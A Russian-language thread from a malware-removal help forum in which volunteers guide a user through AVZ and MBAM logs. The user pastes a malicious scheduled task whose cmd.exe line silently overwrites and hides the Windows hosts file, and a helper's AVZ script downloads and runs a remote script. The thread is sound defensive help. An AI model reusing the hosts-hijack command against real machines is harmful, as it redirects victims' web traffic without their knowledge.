Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 36.

Помогите пожалуйста! Прошу! Дела с компом! (заявка № 132991)

  1. #1
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19

    Помогите пожалуйста! Прошу! Дела с компом!

    Вложение 403554
    Вложение 403555

    вот логи. на 100% уверен что у меня вирус какой то. пользуюсь вай фаем. вконтакте какие то непонятки всегда, группы появляются по 200 штук, в одноклассниках гостей 99+ всегда, спутник майл не удаляется из программ, ещё всяких дофига процессов в диспетчере устройств, что за программы вообще не знаю. на компе стоит только онлайн игра, нфс и ещё парочку мелких. полностью каспером всё проверял, ничего не нашёл. уже параноя появляется что у меня сидит вирус который всё отправляет на серв хакеру всё что я печатаю. и ещё файл ексель менялся на тмп.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,465
    Вес репутации
    343
    Уважаемый(ая) Никита1990, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Внимание !!! База поcледний раз обновлялась 10.11.2012 необходимо обновить базы при помощи автоматического обновления (Файл/Обновление баз). Протокол антивирусной утилиты AVZ версии 4.39.
    Пожалуйста обновите базы и сделайте новые логи.

    + Сделайте логи RSIT.

  5. #4
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    Новые логи
    Вложение 403670
    Вложение 403671
    Вложение 403672

    - - - Добавлено - - -

    ещё вот такая штука стала выскакивать при запуске компа
    http://cs319117.userapi.com/v3191172...0ck6FcJNRA.jpg

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Код:
    C:\windows\tasks\At1.job
    откройте в блокноте и напишите здесь его содержимое.

    - Сделайте лог полного сканирования МВАМ.

  7. #6
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
     uFн6Iб|Eљ†СєС–-F F <
    s$Ђ   *!Э 
    :  У  c m d . e x e З " / c a t t r i b - H C : \ w i n d o w s \ s y s t e m 3 2 \ d r i v e r s \ e t c \ h o s t s & & c o p y C : \ U s e r s \ 7 0 0 5 ~ 1 \ A p p D a t a \ L o c a l \ T e m p \ 2 6 7 1 5 5 7 6 a q C : \ w i n d o w s \ s y s t e m 3 2 \ d r i v e r s \ e t c \ h o s t s / Y & & a t t r i b + H C : \ w i n d o w s \ s y s t e m 3 2 \ d r i v e r s \ e t c \ h o s t s "  A8AB5<0  !>AB02;5=> N e t S c h e d u l e J o b A d d .   0 Э       бvIw   нoБoRюхя¬µд8Ш5ЈW™8очЂvьm7ШЃЩ8‚§Йфы\/T
    ё“Nћ}-bЅYq.ў-P>·uГ:

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Сделаем небольшую проверку.

    1) скачайте отсюда AVZ http://rghost.ru/43737021
    2) Сделайте им лог (стандартный скрипт №2) и прикрепите к сообщению.
    3) Удалите вручную
    Код:
    C:\Windows\tasks\At1.job
    + жду

    Цитата Сообщение от regist Посмотреть сообщение
    - Сделайте лог полного сканирования МВАМ.

  9. #8
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    Пока идёт сканирование файловой системы

    - - - Добавлено - - -

    отчёт Вложение 403822

    - - - Добавлено - - -

    ссылку не могу открыть

    - - - Добавлено - - -

    интернет отключается, потом выскакивает окошко заблокирован доступ программе KMServis.exe как то так и доступ к вредоносному адресу айпи и программа avp.exe потом что-то качается на всей скорости загрузки,вижу по гаджету, ну и только потом зашло в интернет. вот только что.

  10. #9
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    http://rghost.ru/43737021 эту ссылку не открывает

    - - - Добавлено - - -

    отключил все фаерволы, скачал авз, сделал лог авз
    Вложение 403896

  11. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Код:
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Actual Spy\ASMonitor.exe
    - кейлогер устанавливали ?

    Код:
    C:\Users\Ждановы\Downloads\O1.6.exe
    - вам знаком ?
    Заархивируйте в zip архив с паролем virus и загрузите по ссылке Прислать запрошенный карантин вверху темы.

    что с проблемой ?

  12. #11
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    кейлоггер я устанавливал, он виноват?? как удалить?
    - - - Добавлено - - -

    файл добафил в рар архив, потом в зип переименовал. O1.6.exe это файл от офиса, это из-за него всё?

  13. #12
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Код:
    C:\Windows\tasks\At1.job
    удалили ?

    деинсталируйте MBAM отпишитесь, что с проблемой.

  14. #13
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    пока работа компа никаких подозрений не вызывает. но темку не закрывайте.

  15. #14
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Выполните скрипт в AVZ при наличии доступа в интернет:

    Код:
    begin
     if FileExists(GetAVZDirectory + 'log\avz_log.txt') Then DeleteFile('log\avz_log.txt');
     If DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', GetAVZDirectory +'ScanVuln.txt') Then ExecuteScript('ScanVuln.txt')
     Else ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
     if FileExists(GetAVZDirectory + 'log\avz_log.txt') Then ExecuteFile('notepad.exe', GetAVZDirectory + 'log\avz_log.txt', 1, 0, false);
    ExitAVZ;
    end.
    После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

    Советы и рекомендации после лечения компьютера

  16. #15
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    где найти эти программы на компе?
    Поиск критических уязвимостей
    Множественные уязвимости в Sun Java JDK и JRE (32-разрядная версия). Деинсталлируйте старую версию и установите новую:
    http://www.java.com/ru/download/manual_v6.jsp

    Множественные уязвимости в Sun Java JDK и JRE (64-разрядная версия). Деинсталлируйте старую версию и установите новую:
    http://www.java.com/ru/download/manual_v6.jsp

    Обнаружено уязвимостей: 2

  17. #16
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    просто скачайте их по ссылкам и установите. Потом перезагрузите компьютер и снова проверьте, что уязвимостей больше нет.

  18. #17
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    выслал два файла в карантин, появились на рабочем столе. на их месте раньше были другие файлы. уверен что это вирус. пак .tmp посмотрите пожалуйста. сейчас установлю что вы мне сказали.

  19. #18

  20. #19
    Junior Member Репутация
    Регистрация
    09.11.2012
    Сообщений
    29
    Вес репутации
    19
    хорошо. у меня столько процессов выполняется на нотбуке, я даже не знаю откуда и что это за процессы. где можно почитать про них??? кстати KMService.exe у меня это не вирус? и ещё как мне восстановить эти два файла они были у меня другого формата, сейчас *.tmp и весят то по малу 50 кб, а сам я не помню что это за файлы у меня были, до этого недели две назад у меня экселевский файлик в .tmp запаковался с названием из цифп и букв латинского алф. сам! может быть такое что вирусы ещё есть или кто-то залазит в мой комп через удалённый доступ??? программы java установил

  21. #20
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,434
    Вес репутации
    730
    Цитата Сообщение от Никита1990 Посмотреть сообщение
    кстати KMService.exe у меня это не вирус?
    нет.
    Цитата Сообщение от Никита1990 Посмотреть сообщение
    у меня столько процессов выполняется на нотбуке, я даже не знаю откуда и что это за процессы. где можно почитать про них???
    поиск в гугле по названию.
    Цитата Сообщение от Никита1990 Посмотреть сообщение
    и ещё как мне восстановить эти два файла они были у меня другого формата,
    не знаю, и не представляю, что вас там произошло. Может вы их сами куда-то переместили ?
    Цитата Сообщение от Никита1990 Посмотреть сообщение
    у меня экселевский файлик в .tmp запаковался с названием из цифп и букв латинского алф. сам!
    что значит запаковался ? а потом вы его нормально открыли ?

    сделайте на всякий случай ещё

    - Сделайте лог полного сканирования МВАМ.

    - Проведите процедуру, которая описана тут. Результат загрузки напишите в сообщении здесь.

  • Уважаемый(ая) Никита1990, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 1
      Последнее сообщение: 10.05.2011, 23:06
    2. помогите с компом
      От poma80 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 07.03.2010, 17:21
    3. Ответов: 3
      Последнее сообщение: 22.02.2009, 07:45
    4. Ответов: 4
      Последнее сообщение: 07.08.2008, 16:10
    5. Ответов: 1
      Последнее сообщение: 31.08.2007, 20:21

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01357 seconds with 16 queries